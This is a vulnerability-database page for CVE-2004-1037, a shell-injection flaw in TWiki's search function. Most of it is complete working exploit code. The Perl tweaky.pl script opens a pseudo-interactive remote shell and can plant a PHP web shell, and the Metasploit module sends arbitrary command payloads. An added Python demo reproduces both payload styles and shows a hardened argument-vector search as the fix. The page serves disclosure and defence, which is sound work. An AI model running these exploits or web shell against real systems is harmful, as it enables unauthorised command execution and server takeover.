CVE-2004-1037 : Detail


EPSS (v3 model): 94.2%
Attack vector: Network
Published: 2004-11-19 04h00 +00:00
Last modified: 2017-07-10 12h57 +00:00

CVE Description

The search function in TWiki 20030201 allows remote attackers to execute arbitrary commands via shell metacharacters in a search string.

CVE Information

Metrics

Metrics  Score  Severity  CVSS Vector                 Source
V2       10.0   HIGH      AV:N/AC:L/Au:N/C:C/I:C/A:C  [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% to 100%). The higher the score, the greater the probability that the vulnerability will be exploited in the wild.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile therefore lets you compare one CVE's EPSS score with the scores of all others.

Exploit information

Exploit Database EDB-ID : 642

Publication date : 2004-11-19 23h00 +00:00
Author : RoMaNSoFt
EDB Verified : Yes

#!/usr/bin/perl
# "tweaky.pl" v. 1.0 beta 2
#
# Proof of concept for TWiki vulnerability. Remote code execution
# Vuln discovered, researched and exploited by RoMaNSoFt <roman rs-labs com>
#
# Madrid, 30.Sep.2004.

require LWP::UserAgent;
use Getopt::Long;

### Default config
$host = '';
$path = '/cgi-bin/twiki/search/Main/';
$secure = 0;
$get = 0;
$post = 0;
$phpshellpath = '';
# Shell pipeline that writes a one-line PHP shell (roughly
# <? $out = shell_exec($_GET["cmd"]." 2>&1"); echo "<pre>$out</pre>"; ?>)
# to the path given by --phpshellpath. The chr() calls produce the < > ? &
# characters so they never appear literally in the injected search string.
$createphpshell = '(echo `perl -e \'print chr(60).chr(63)\'` ; echo \'$out = shell_exec($_GET["cmd"]. " 2\'`perl -e \'print chr(62).chr(38)\'`\'1");\' ; echo \'echo "\'`perl -e \'print chr(60)."pre".chr(62)."\\\\ $out".chr(60)."/pre".chr(62)\'`\'";\' ; echo `perl -e \'print chr(63).chr(62)\'`) | tee ';
$logfile = ''; # If empty, logging will be disabled
$prompt = "tweaky\$ ";
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)';
$proxy = '';
$proxy_user = '';
$proxy_pass = '';
$basic_auth_user = '';
$basic_auth_pass = '';
$timeout = 30;
$debug = 0;
$init_command = 'uname -a ; id';
$start_mark = 'AAAA';
$end_mark = 'BBBB';
# Injection skeleton: the leading quote closes TWiki's quoted search term,
# the command's output is rewritten by sed into AAAA<line>BBBB.txt so every
# line is displayed as a matching topic name, and the trailing fgrep swallows
# the closing quote and the *.txt that TWiki appends to the command line.
$pre_string = 'nonexistantttt\' ; (';
$post_string = ') | sed \'s/\(.*\)/'.$start_mark.'\1'.$end_mark.'.txt/\' ; fgrep -i -l -- \'nonexistantttt';
# The search page bolds each topic name, so output lines come back as
# <b>AAAA...BBBB</b> and are parsed out again in run_it().
$delim_start = '<b>'.$start_mark;
$delim_end = $end_mark.'</b>';

print "Proof of concept for TWiki vulnerability. Remote code execution.\n";
print "(c) RoMaNSoFt, 2004. <roman\@rs-labs.com>\n\n";

### User-supplied config (read from the command-line)
$parsing_ok = GetOptions (
    'host=s'            => \$host,
    'path=s'            => \$path,
    'secure'            => \$secure,
    'get'               => \$get,
    'post'              => \$post,
    'phpshellpath=s'    => \$phpshellpath,
    'logfile=s'         => \$logfile,
    'init_command=s'    => \$init_command,
    'useragent=s'       => \$useragent,
    'proxy=s'           => \$proxy,
    'proxy_user=s'      => \$proxy_user,
    'proxy_pass=s'      => \$proxy_pass,
    'basic_auth_user=s' => \$basic_auth_user,
    'basic_auth_pass=s' => \$basic_auth_pass,
    'timeout=i'         => \$timeout,
    'debug'             => \$debug,
    'start_mark=s'      => \$start_mark,
    'end_mark=s'        => \$end_mark
);

### Some basic checks
&banner unless ($parsing_ok);
if ($get and $post) {
    print "Choose one only method! (GET or POST)\n\n";
    &banner;
}
if (!($get or $post)) {
    # If not specified we prefer POST method
    $post = 1;
}
if (!$host) {
    print "You must specify a target hostname! (tip: --host <hostname>)\n\n";
    &banner;
}
$url = ($secure ? 'https' : 'http') . "://" . $host . $path;

### Checking for a vulnerable TWiki
&run_it ($init_command, 'RS-Labs rlz!');

### Execute selected payload
if ($phpshellpath) {
    &create_phpshell;
    print "PHPShell created.";
} else {
    &pseudoshell;
}

### End
exit(0);

### Create PHPShell
sub create_phpshell {
    $createphpshell .= $phpshellpath;
    &run_it($createphpshell, 'yeah!');
}

### Pseudo-shell
sub pseudoshell {
    open(LOGFILE, ">>$logfile") if $logfile;
    open(STDINPUT, '-');
    print "Welcome to RoMaNSoFt's pseudo-interactive shell :-)\n[Type Ctrl-D or (bye, quit, exit, logout) to exit]\n \n".$prompt.$init_command."\n";
    &run_it ($init_command);
    print $prompt;
    while (<STDINPUT>) {
        chop;
        if ($_ eq "bye" or $_ eq "quit" or $_ eq "exit" or $_ eq "logout") {
            exit(1);
        }
        &run_it ($_) unless !$_;
        print "\n".$prompt;
    }
    close(STDINPUT);
    close(LOGFILE) if $logfile;
}

### Print banner and die
sub banner {
    print "Syntax: ./tweaky.pl --host=<host> [options]\n\n";
    print "Proxy options: --proxy=http://proxy:port --proxy_user=foo --proxy_pass=bar\n";
    print "Basic auth options: --basic_auth_user=foo --basic_auth_pass=bar\n";
    print "Secure HTTP (HTTPS): --secure\n";
    print "Path to CGI: --path=$path\n";
    print "Method: --get | --post\n";
    print "Enable logging: --logfile=/path/to/a/file\n";
    print "Create PHPShell: --phpshellpath=/path/to/phpshell\n";
    exit(1);
}

### Execute command via vulnerable CGI
sub run_it {
    my ($command, $testing_vuln) = @_;
    my $req;
    my $ua = new LWP::UserAgent;
    $ua->agent($useragent);
    $ua->timeout($timeout);

    # Build CGI param and urlencode it
    my $search = $pre_string . $command . $post_string;
    $search =~ s/(\W)/"%" . unpack("H2", $1)/ge;

    # Case GET
    if ($get) {
        $req = HTTP::Request->new('GET', $url . "?scope=text&order=modified&search=$search");
    }
    # Case POST
    if ($post) {
        $req = new HTTP::Request POST => $url;
        $req->content_type('application/x-www-form-urlencoded');
        $req->content("scope=text&order=modified&search=$search");
    }

    # Proxy definition
    if ($proxy) {
        if ($secure) {
            # HTTPS request
            $ENV{HTTPS_PROXY} = $proxy;
            $ENV{HTTPS_PROXY_USERNAME} = $proxy_user;
            $ENV{HTTPS_PROXY_PASSWORD} = $proxy_pass;
        } else {
            # HTTP request
            $ua->proxy(['http'] => $proxy);
            $req->proxy_authorization_basic($proxy_user, $proxy_pass);
        }
    }

    # Basic Authorization
    $req->authorization_basic($basic_auth_user, $basic_auth_pass) if ($basic_auth_user);

    # Launch request and parse results
    my $res = $ua->request($req);
    if ($res->is_success) {
        print LOGFILE "\n".$prompt.$command."\n" if ($logfile and !$testing_vuln);
        @content = split("\n", $res->content);
        my $empty_response = 1;
        foreach $_ (@content) {
            my ($match) = ($_ =~ /$delim_start(.*)$delim_end/g);
            if ($debug) {
                print $_ . "\n";
            } else {
                if ($match) {
                    $empty_response = 0;
                    print $match . "\n" unless ($testing_vuln);
                }
            }
            print LOGFILE $match . "\n" if ($match and $logfile and !$testing_vuln);
        }
        if ($empty_response) {
            if ($testing_vuln) {
                die "Sorry, exploit didn't work!\nPerhaps TWiki is patched or you supplied a wrong URL (remember it should point to Twiki's search page).\n";
            } else {
                print "[Server issued an empty response. Perhaps you entered a wrong command?]\n";
            }
        }
    } else {
        die "Couldn't connect to server. Error message follows:\n" . $res->status_line . "\n";
    }
}

# milw0rm.com [2004-11-20]
Exploit Database EDB-ID : 16894

Publication date : 2010-07-02 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: twiki_search.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TWiki Search Function Arbitrary Command Execution',
      'Description'    => %q{
          This module exploits a vulnerability in the search component of TWiki. By
        passing a 'search' parameter containing shell metacharacters to the
        'WebSearch' script, an attacker can execute arbitrary OS commands.
      },
      'Author'         =>
        [
          # Unknown - original discovery
          'jduck' # metasploit version
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9671 $',
      'References'     =>
        [
          [ 'CVE', '2004-1037' ],
          [ 'OSVDB', '11714' ],
          [ 'BID', '11674' ],
          [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
        ],
      'Privileged'     => true, # web server context
      'Payload'        =>
        {
          'DisableNops' => true,
          'BadChars'    => ' ',
          'Space'       => 1024,
        },
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Oct 01 2004',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
      ], self.class)
  end

  def check
    content = rand_text_alphanumeric(16+rand(16))
    test_file = rand_text_alphanumeric(8+rand(8))
    cmd_base = datastore['URI'] + '/view/Main/WebSearch?search='
    test_url = datastore['URI'] + '/view/Main/' + test_file

    # first see if it already exists (it really shouldn't)
    res = send_request_raw({ 'uri' => test_url }, 25)
    if (not res) or (res.body.match(content))
      print_error("WARNING: The test file exists already!")
      return Exploit::CheckCode::Safe
    end

    # try to create it
    print_status("Attempting to create #{test_url} ...")
    search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'"
    res = send_request_raw({ 'uri' => cmd_base + Rex::Text.uri_encode(search) }, 25)
    if (not res) or (res.code != 200)
      return Exploit::CheckCode::Safe
    end

    # try to run it, 500 code == successfully made it
    res = send_request_raw({ 'uri' => test_url }, 25)
    if (not res) or (not res.body.match(content))
      return Exploit::CheckCode::Safe
    end

    # delete the tmp file
    print_status("Attempting to delete #{test_url} ...")
    search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'"
    res = send_request_raw({ 'uri' => cmd_base + Rex::Text.uri_encode(search) }, 25)
    if (not res) or (res.code != 200)
      print_error("WARNING: unable to remove test file (#{test_file})")
    end

    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    search = rand_text_alphanumeric(1+rand(8))
    search << "';" + payload.encoded + ";#\'"

    query_str = datastore['URI'] + '/view/Main/WebSearch'
    query_str << '?search='
    query_str << Rex::Text.uri_encode(search)

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => query_str,
    }, 25)

    if (res and res.code == 200)
      print_status("Successfully sent exploit request")
    else
      raise RuntimeError, "Error sending exploit request"
    end

    handler
  end

end
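The CVE description says only that shell metacharacters in the search string lead to command execution; the two exploits above show the two ways that is turned into a working payload. The Python script below is an added example, not TWiki's code and not either exploit: it stands in for the vulnerable command builder (a grep over topic files assembled as a single shell string and handed to /bin/sh), reproduces the shape of both payloads (tweaky.pl's output wrapped in marker strings so it is rendered as fake topic names, and the Metasploit check's `${IFS}` and `#'` tricks), and puts a hardened argument-vector version beside it. The sample corpus, the marker strings and the `echo INJECTED` command are constructed for the demo; the hardened function is a suggested fix, not the patch TWiki shipped.

```python
"""Shell-metacharacter injection in a grep-backed wiki search, with a hardened form.

Added example: a stand-in for the vulnerable command builder, not TWiki's own code.
The payload helpers copy the shape of tweaky.pl and the Metasploit check; the
corpus, marker strings and injected command are constructed for this demo.
"""
import os
import subprocess
import tempfile

# Constructed sample corpus: topic files as a wiki might keep them on disk.
SAMPLE_TOPICS = {
    "WebHome.txt": "Welcome to the Main web.\n",
    "ReleaseNotes.txt": "Nothing to see here.\n",
}


def make_corpus():
    """Write the sample topics into a fresh temp directory and return its path."""
    workdir = tempfile.mkdtemp(prefix="wiki-search-demo-")
    for name, body in SAMPLE_TOPICS.items():
        with open(os.path.join(workdir, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return workdir


def search_vulnerable(term, workdir):
    """The flaw: the user's search string is spliced into one shell command line.

    The single quotes look protective, but a quote inside `term` closes them and
    everything that follows is parsed as shell syntax. stdin is /dev/null, as it
    would be for a CGI, so a grep left without file operands does not block.
    """
    cmd = "grep -i -l -- '%s' *.txt" % term
    proc = subprocess.run(cmd, shell=True, cwd=workdir, stdin=subprocess.DEVNULL,
                          capture_output=True, text=True)
    return proc.stdout.splitlines()


def search_hardened(term, workdir):
    """Suggested fix (not the patch TWiki shipped): no shell, one argv element per
    token. The term reaches grep as data only; -F makes it a literal string rather
    than a regex, and -- keeps a term starting with '-' from being read as an option.
    """
    files = sorted(f for f in os.listdir(workdir) if f.endswith(".txt"))
    argv = ["grep", "-i", "-l", "-F", "--", term] + files
    proc = subprocess.run(argv, cwd=workdir, stdin=subprocess.DEVNULL,
                          capture_output=True, text=True)
    return proc.stdout.splitlines()


def tweaky_style_payload(command, start_mark="AAAA", end_mark="BBBB"):
    """Shape of tweaky.pl's pre/post strings: close the quote, run the command, and
    rewrite each output line as MARK<line>MARK.txt so the wiki renders it as a hit
    in the result list; a final grep re-absorbs the template's trailing `' *.txt`.
    (tweaky.pl does the rewriting with sed; a read loop is used here.)"""
    return (
        "nonexistantttt' ; (%s) | while read -r l; do echo \"%s${l}%s.txt\"; done ; "
        "grep -i -l -- 'nonexistantttt" % (command, start_mark, end_mark)
    )


def msf_style_payload(command):
    """Shape of the Metasploit check: close the quote, run the command, then let `#`
    comment out the rest of the line (the `' *.txt` the template appends). Spaces
    become ${IFS}, which the shell splits on, because the module lists ' ' as a bad
    character."""
    return "1';" + command.replace(" ", "${IFS}") + ";#'"


def extract_marked(lines, start_mark="AAAA", end_mark="BBBB"):
    """Recover command output from the fake topic names, as tweaky.pl's regex does."""
    suffix = end_mark + ".txt"
    return [line[len(start_mark):-len(suffix)]
            for line in lines if line.startswith(start_mark) and line.endswith(suffix)]


def demo():
    """Run the four cases against a fresh corpus and return their results."""
    workdir = make_corpus()
    injected = "echo INJECTED"
    return {
        "benign": search_vulnerable("welcome", workdir),
        "tweaky": extract_marked(search_vulnerable(tweaky_style_payload(injected), workdir)),
        "msf": search_vulnerable(msf_style_payload(injected), workdir),
        "hardened": search_hardened(tweaky_style_payload(injected), workdir),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print("%-9s %r" % (case, result))
```

Running the script (any file name; `grep` and `/bin/sh` must be on the path) shows the benign term returning the one matching topic, both injected terms returning `INJECTED` as if it were a topic name, and the hardened search returning nothing for the same payload. The point of the hardened version is that the fix is not escaping or a metacharacter blacklist but removing the shell from the path entirely: once the term is an argv element, quotes, `;`, `$`, `#` and `${IFS}` are just bytes grep compares against file contents.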

Products Mentioned

Configuration 0

Twiki >> Twiki >> Version 2003-02-01

Configuration 0

Gentoo >> Linux >> Version *

References

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000918
Tags : vendor-advisory, x_refsource_CONECTIVA
http://www.securityfocus.com/bid/11674
Tags : vdb-entry, x_refsource_BID
http://security.gentoo.org/glsa/glsa-200411-33.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://marc.info/?l=bugtraq&m=110037207516456&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.ciac.org/ciac/bulletins/p-039.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC